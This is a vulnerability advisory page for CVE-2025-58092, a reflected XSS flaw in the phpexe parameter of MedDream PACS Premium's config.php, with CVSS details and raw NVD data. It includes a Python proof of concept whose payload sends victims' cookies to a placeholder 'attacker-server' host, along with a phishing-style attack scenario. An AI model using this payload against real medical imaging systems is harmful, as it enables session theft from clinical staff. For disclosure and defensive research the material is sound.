Security Vulnerability Report
中文
CVE-2025-58092 CVSS 6.1 MEDIUM

CVE-2025-58092

Published: 2026-01-20 15:17:05
Last Modified: 2026-01-29 14:58:36

Description

Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities.This vulnerability affects the phpexe parameter.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:meddream:pacs_server:7.3.6.870:*:*:*:premium:*:*:* - VULNERABLE
MedDream PACS Premium 7.3.6.870及之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-58092 PoC - MedDream PACS Premium Reflected XSS # Affected Parameter: phpexe in config.php # CVSS 3.1: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N import urllib.parse def generate_xss_payload(): """ Generate malicious URL for CVE-2025-58092 This PoC demonstrates reflected XSS in phpexe parameter """ base_url = "http://target-server/meddream/config.php" # Basic XSS payload - steals cookies xss_payload = "<script>alert('XSS Vulnerability - CVE-2025-58092');document.location='http://attacker-server/steal?c='+document.cookie</script>" # Alternative payload using img onerror img_payload = "<img src=x onerror='alert(document.cookie)'/>" # URL encode the payloads encoded_xss = urllib.parse.quote(xss_payload) encoded_img = urllib.parse.quote(img_payload) # Generate malicious URLs malicious_url1 = f"{base_url}?phpexe={encoded_xss}" malicious_url2 = f"{base_url}?phpexe={encoded_img}" print("[+] CVE-2025-58092 Reflected XSS PoC") print("[+] Target: MedDream PACS Premium 7.3.6.870") print("=" * 60) print(f"[+] Malicious URL 1 (Cookie Theft):\n{malicious_url1}") print(f"\n[+] Malicious URL 2 (Simple Alert):\n{malicious_url2}") print("\n[!] Social Engineering Required: Trick victim into clicking the link") return malicious_url1, malicious_url2 if __name__ == "__main__": generate_xss_payload() # Example attack scenario: # 1. Attacker crafts malicious URL with XSS payload # 2. Attacker sends link via email/chat to victim # 3. Victim clicks link, browser executes malicious JS # 4. Attacker steals session cookies or performs actions

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58092", "sourceIdentifier": "[email protected]", "published": "2026-01-20T15:17:04.887", "lastModified": "2026-01-29T14:58:36.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple reflected cross-site scripting (xss) vulnerabilities exist in the config.php functionality of MedDream PACS Premium 7.3.6.870. Specially crafted malicious URLs can lead to arbitrary javascript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities.This vulnerability affects the phpexe parameter."}, {"lang": "es", "value": "Múltiples vulnerabilidades de cross-site scripting (XSS) reflejado existen en la funcionalidad config.php de MedDream PACS Premium 7.3.6.870. URLs maliciosas especialmente diseñadas pueden conducir a la ejecución arbitraria de código javascript. Un atacante puede proporcionar una URL diseñada para activar estas vulnerabilidades. Esta vulnerabilidad afecta al parámetro phpexe."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:meddream:pacs_server:7.3.6.870:*:*:*:premium:*:*:*", "matchCriteriaId": "0F239E49-18E8-4DE0-B9B8-C220C3BC0C62"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2271", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}